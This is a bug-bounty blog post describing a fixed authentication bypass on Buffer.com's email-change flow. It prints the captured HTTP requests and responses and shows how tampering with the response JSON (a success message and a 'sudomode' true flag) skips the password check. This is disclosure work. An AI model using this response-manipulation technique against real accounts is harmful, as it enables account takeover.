Skip to main content
HashnodeAddictive HackersAddictive Hackers

Command Palette

Search for a command to run...

Buffer Authentication Bypass

Published
Buffer Authentication Bypass
D
Dipak kumar Das

Hi everyone , here is one of my finding on Buffer.com . Where i managed to bypass the authentication

So basically the authentication work flow is like below

  • To change account email user need to provide the current account password
  • If the password is correct then application let you to change the account email

So lets start

when user want to change their account email id the app ask for current password like below

so here i wanted to test the response for both correct and incorrect password response

so here is the request

*POST /account/set-sudomode HTTP/1.1 200 OK
Date: \*****
Host:buffer.com
User-Agent: Mozila/5.0
X-Request-With: XMLHttpRequest

csrf_token=uyr37832rhehr8&password=wrongpassword**

so the response for wrong password is below

*HTTP/1.1 200 OK
Date: Mon,\****
Content-Lenght: 139
Connection:close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8"}**

so here is the response for correct password

*HTTP/1.1 200 OK
Date: Mon,\****
Content-Lenght: 139
Connection:close

{"notice_message":"Great, we believe it's really you","sudomode":"true","csrf_token":"Csrftoken"}**

if you observe both response just the notice_message and sudomode added in the correct password response
so here i used a wrong password let say 123456

Request is like below
*POST /account/set-sudomode HTTP/1.1 200 OK
Date: \*****
Host:buffer.com
User-Agent: Mozila/5.0
X-Request-With: XMLHttpRequest

csrf_token=uyr37832rhehr8he7372829hefdgdf&password=123456**

Note the csrf _token value in the request that is :
uyr37832rhehr8he7372829hefdgdf

Response

*HTTP/1.1 200 OK
Date: Mon,\****
Content-Lenght: 139
Connection:close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"**uyr37832rhehr8he7372829hefdgdf"}

Modify the response to
*HTTP/1.1 200 OK
Date: Mon,\****
Content-Lenght: 139
Connection:close

{"notice_message":"Great, we believe it's really you","sudome":"true","csrf_token":"**uyr37832rhehr8he7372829hefdgdf**"}
Boom now it will show successfully authenticated and you can change your email
So here is the video proof of concept

Status: Fixed
Bounty Rewarded

More from this blog

Addictive Hackers

9 posts

Buffer Authentication Bypass